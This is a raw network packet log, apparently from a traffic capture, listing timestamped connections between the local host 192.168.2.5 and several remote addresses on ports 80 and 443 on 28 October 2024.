                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448560953 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448847055 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448926926 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448939085 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448978901 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.448995113 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.449099064 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.449507952 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.449521065 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.449532032 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.449580908 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.492872953 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.492892981 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.492927074 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.492934942 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.492954969 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.493025064 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.542292118 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.542304039 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.542315960 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.542413950 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.542413950 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.548422098 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.548449993 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.548496008 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.548508883 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.548527956 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.548551083 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.565783978 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.565840960 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.565932035 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.565943003 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566015005 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566195965 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566214085 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566225052 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566272974 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566298962 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566303968 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566361904 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566488028 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566948891 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566961050 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.566972017 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.567003965 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.567028046 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.567193031 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.567208052 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.567220926 CET49829443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.567229033 CET4434982913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.570976019 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.571008921 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.571094990 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.571734905 CET49835443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.571748972 CET4434983513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.571988106 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.572267056 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.572283030 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.572767973 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.573474884 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.573555946 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.573689938 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.600627899 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.607433081 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.607448101 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.607830048 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.607836008 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.610111952 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.610124111 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.610135078 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.610160112 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.610174894 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.611455917 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.612104893 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.612123966 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.612513065 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.612519026 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.615356922 CET4434983013.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.645247936 CET49830443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.646845102 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.647797108 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.647814035 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.648447990 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.648453951 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659006119 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659027100 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659046888 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659077883 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659115076 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659296036 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659306049 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.659362078 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.668286085 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.668312073 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.668354034 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.668364048 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.668392897 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.668412924 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.683965921 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684030056 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684139967 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684151888 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684236050 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684386969 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684396982 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684436083 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684457064 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684950113 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.684964895 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.685007095 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.685023069 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.685781956 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.685795069 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.685806036 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.685853004 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704034090 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704056978 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704071045 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704096079 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704108000 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704118013 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704123974 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704138994 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704150915 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704164028 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.704176903 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.732276917 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.732300997 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.732311964 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.732376099 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736006975 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736160040 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736737967 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736901999 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736901999 CET49832443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736913919 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.736922979 CET4434983213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.740973949 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.740999937 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.741319895 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.741476059 CET49836443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.741485119 CET4434983613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744153023 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744489908 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744553089 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744668961 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744682074 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744693995 CET49831443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.744700909 CET4434983113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.747153044 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.747226000 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.747361898 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.747539997 CET49837443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.747571945 CET4434983713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.778444052 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.778469086 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.778480053 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.778543949 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.780301094 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.781989098 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.782062054 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.782423019 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.782438993 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.782449961 CET49833443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.782457113 CET4434983313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.784987926 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.785013914 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.785080910 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.785103083 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.785135984 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.785160065 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.793725014 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.793742895 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.793807030 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.793828964 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.794290066 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.804965019 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.805001020 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.805418015 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.805567980 CET49839443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.805593014 CET4434983913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.824853897 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.824877977 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.824928999 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.824945927 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.824960947 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.824989080 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.911047935 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.911071062 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.911118984 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.911170006 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.911201000 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.911222935 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942750931 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942761898 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942778111 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942785025 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942814112 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942827940 CET443498284.152.133.8192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.942859888 CET49828443192.168.2.54.152.133.8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.950979948 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951025009 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951036930 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951103926 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951150894 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951354980 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951366901 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951425076 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951607943 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951620102 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951631069 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951668978 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.951703072 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952039003 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952054977 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952106953 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952287912 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952342033 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952353954 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952389002 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952425003 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952795029 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952805996 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.952847004 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953166008 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953238010 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953274012 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953301907 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953320026 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953386068 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953505993 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953519106 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953550100 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953833103 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953908920 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953963995 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.953963995 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.966479063 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.966540098 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.966700077 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:29.966748953 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.029530048 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.029551983 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.029601097 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.029642105 CET4434982113.107.246.57192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.029673100 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.029691935 CET49821443192.168.2.513.107.246.57
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.036626101 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.036691904 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.036791086 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.036803007 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.036843061 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:30.037079096 CET804979677.83.175.105192.168.2.5
